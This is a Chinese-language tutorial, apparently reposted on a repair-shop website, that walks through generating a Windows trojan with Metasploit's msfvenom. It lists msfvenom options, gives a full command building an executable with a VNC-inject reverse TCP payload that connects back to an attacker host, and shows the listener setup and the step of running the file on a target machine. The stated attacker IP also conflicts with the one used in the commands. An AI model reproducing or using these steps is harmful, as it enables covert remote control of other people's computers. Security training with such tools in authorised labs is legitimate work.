Metasploit |
您所在的位置:网站首页 › metasploit 免杀 › Metasploit |
以前的人,要疯要癫要崩溃,都特别戏剧化,比如披头散发,涕泗横流,瞠目结舌等等。现在的人不会,他就静静地坐在那里,面无表情,不声不响,看着很正常,但禁不起触碰。你上前轻轻碰一下,问一句,他就垮了,就崩溃了。。。 ---- 网易云热评 一、生成方式:利用msf模块中的msfvenom模块 二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 三、msfvenom命令行选项如下 -p, --payload 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定 -l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, --nopsled 为payload预先指定一个NOP滑动长度 -f, --format 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表) -e, --encoder [encoder] 指定需要使用的encoder(编码器) -a, --arch 指定payload的目标架构 --platform 指定payload的目标平台 -s, --space 设定有效攻击荷载的最大长度 -b, --bad-chars 设定规避字符集,比如: '\x00\xff' -i, --iterations 指定payload的编码次数 -c, --add-code 指定一个附加的win32 shellcode文件 -x, --template 指定一个自定义的可执行文件作为模板 -k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行 --payload-options 列举payload的标准选项 -o, --out 保存payload -v, --var-name 指定一个自定义的变量,以确定输出格式 --shellest 最小化生成payload -h, --help 查看帮助选项 --help-formats 查看msf支持的输出格式列表 四、使用方法 1、msfvenom --list platforms 显示支持的平台 2、msfvenom --list formats 显示支持的格式 3、msfvenom --list archs 显示支持的架构 4、msfvenom --list encoders 显示支持的编码器 5、生成木马 目标主机:192.168.1.129(win7 x64) 攻击机:192.168.1.33 攻击端口:12121 生成木马:msfvenom --arch x64 --platform windows -p windows/x64/vncinject/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe 6、进入监听模块 use exploit/multi/handler 7、设置payload反弹 set payload windows/x64/vncinject/reverse_tcp 8、查看需要设置的参数:show options 9、设置攻击机ip:set lhost 192.168.1.133 10、设置攻击端口:set lport 12121 11、将生成的exe文件上传到目标主机并运行 12、run攻击 13、攻击机的监控画面 14、目标主机画面 禁止非法,后果自负 欢迎关注公众号:web安全工具库
|
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |